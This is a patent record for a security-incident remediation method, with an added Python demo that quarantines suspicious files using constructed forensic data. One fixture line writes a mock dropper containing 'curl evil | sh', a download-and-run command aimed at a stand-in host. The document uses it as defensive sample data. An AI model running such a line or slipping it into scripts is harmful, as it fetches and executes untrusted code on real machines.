SYSTEM AND METHOD FOR REAL-TIME REMEDIATION RESPECTIVE OF SECURITY INCIDENTS
Abstract
A system, an apparatus, and a method thereof identify at least one security threat in an enterprise's network. The system characterizes sources affected by the security threat within the enterprise's network. The identification of the sources affected by the security threat is made based on the forensic data extracted by the system. The system then suspends the affected sources. The system also stores the affected sources in a separate memory to prevent execution thereof.
20 Claims
1. A method of remediating at least one security incident in a computer network, comprising:
identifying, by a computer, said at least one security incident in the computer network based on forensic data;
identifying, by the computer, at least one resource affected by the security incident based on the identified security incident;
suspending the at least one identified resource; and
storing the identified at least one resource in a separate memory that is not connected to the computer network.
Dependent claims: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11.

12. An apparatus of remediating at least one security incident in a computer network, comprising:
a memory configured to store computer-executable instructions;
a processor configured to execute the stored instructions, which when executed configure the processor to:
identify said at least one security incident in the computer network based on forensic data;
identify at least one resource affected by the security incident based on the identified security incident;
suspend the at least one identified resource; and
store the identified at least one resource in a separate memory that is not connected to the computer network.
Dependent claims: 13, 14, 15, 16, 17, 18, 19, 20.
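The four claim steps (identify the incident from forensic data, resolve the affected resources, suspend them, store them in a separate memory) as an added Python example. This is not code from the patent or its assignee; it is written here to show what the claimed sequence looks like in practice for file resources. Everything in it is an assumption: the forensic records and their "score" field are constructed, the incident threshold of 80 is arbitrary, a resource (host, /path) is assumed to live at sandbox/host/path on the local machine, and an ordinary quarantine directory stands in for the claim's "separate memory that is not connected to the computer network" (a real deployment would still need an export step to air-gapped storage). Hashing each artifact before it is touched is added so the quarantine manifest can serve as evidence later.

```python
"""Identify -> resolve affected resources -> suspend -> quarantine (added example)."""
import hashlib
import json
import shutil
import stat
import tempfile
from pathlib import Path

# Constructed forensic records (not real data). "score" stands in for whatever the
# forensic pipeline actually emits (YARA hits, EDR verdict, anomaly score, ...).
FORENSIC_RECORDS = [
    {"host": "ws-01", "event": "exec",  "image": "/opt/app/bin/agent",  "score": 10},
    {"host": "ws-01", "event": "exec",  "image": "/tmp/.cache/dropper", "score": 95},
    {"host": "ws-01", "event": "write", "image": "/tmp/.cache/dropper",
     "target": "/tmp/.cache/payload.so", "score": 95},
    {"host": "ws-02", "event": "exec",  "image": "/usr/sbin/sshd",      "score": 5},
]
INCIDENT_THRESHOLD = 80  # assumed cut-off, not from the patent


def identify_incidents(records, threshold=INCIDENT_THRESHOLD):
    """Claim step 1: an incident is any forensic record at or above the threshold."""
    return [r for r in records if r["score"] >= threshold]


def affected_resources(incidents, records):
    """Claim step 2: the offending image of each incident plus every file that
    image wrote anywhere in the forensic data (a single pivot on host+image)."""
    resources = set()
    for inc in incidents:
        resources.add((inc["host"], inc["image"]))
        for r in records:
            if (r["host"], r["image"], r["event"]) == (inc["host"], inc["image"], "write"):
                resources.add((r["host"], r["target"]))
    return sorted(resources)


def suspend_and_quarantine(path: Path, quarantine_dir: Path) -> dict:
    """Claim steps 3 and 4 for one file resource.
    Hash first (chain of custody), strip every execute bit so the file cannot run
    even if it is copied back, then move it into the separate quarantine store.
    Assumption: quarantine_dir is only a stand-in for an air-gapped memory."""
    digest = hashlib.sha256(path.read_bytes()).hexdigest()
    path.chmod(stat.S_IRUSR)  # suspended: owner read-only, no execute bit anywhere
    dest = quarantine_dir / f"{digest}.quarantined"
    shutil.move(str(path), str(dest))
    entry = {"original": str(path), "stored_as": str(dest), "sha256": digest}
    with (quarantine_dir / "manifest.jsonl").open("a", encoding="utf-8") as fh:
        fh.write(json.dumps(entry) + "\n")
    return entry


def remediate(records, sandbox: Path, quarantine_dir: Path) -> dict:
    """Run all four claim steps. Hypothetical layout: resource (host, /p) is at sandbox/host/p."""
    incidents = identify_incidents(records)
    resources = affected_resources(incidents, records)
    quarantined = []
    for host, logical in resources:
        local = sandbox / host / logical.lstrip("/")
        if local.is_file():
            quarantined.append(suspend_and_quarantine(local, quarantine_dir))
    return {"incidents": incidents, "resources": resources, "quarantined": quarantined}


def demo() -> dict:
    """Create the constructed artifacts in a temp dir, remediate, and report what happened."""
    root = Path(tempfile.mkdtemp(prefix="remediation-"))
    sandbox, qdir = root / "sandbox", root / "quarantine"
    qdir.mkdir()
    for host, logical, body in [  # constructed file contents, all executable to start with
        ("ws-01", "/opt/app/bin/agent", b"#!/bin/sh\necho benign\n"),
        ("ws-01", "/tmp/.cache/dropper", b"#!/bin/sh\ncurl evil | sh\n"),
        ("ws-01", "/tmp/.cache/payload.so", b"\x7fELF-constructed"),
        ("ws-02", "/usr/sbin/sshd", b"\x7fELF-constructed-sshd"),
    ]:
        p = sandbox / host / logical.lstrip("/")
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)
        p.chmod(0o755)
    result = remediate(FORENSIC_RECORDS, sandbox, qdir)
    result["still_present"] = sorted(
        str(p.relative_to(sandbox)) for p in sandbox.rglob("*") if p.is_file())
    result["quarantine_modes"] = sorted(
        {p.stat().st_mode & 0o777 for p in qdir.glob("*.quarantined")})
    result["manifest_lines"] = (qdir / "manifest.jsonl").read_text().count("\n")
    shutil.rmtree(root)
    return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2, default=str))
```

Running `demo()` leaves the two benign binaries in place, moves the dropper and the library it wrote into the quarantine store under their SHA-256 names with mode 0400, and appends one manifest line per artifact. The pivot in `affected_resources` is the part worth extending in a real tool: the claim only says "based on the identified security incident", and how far you follow writes, spawned processes and network connections from the first hit decides both how much you contain and how much collateral you suspend.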
Specification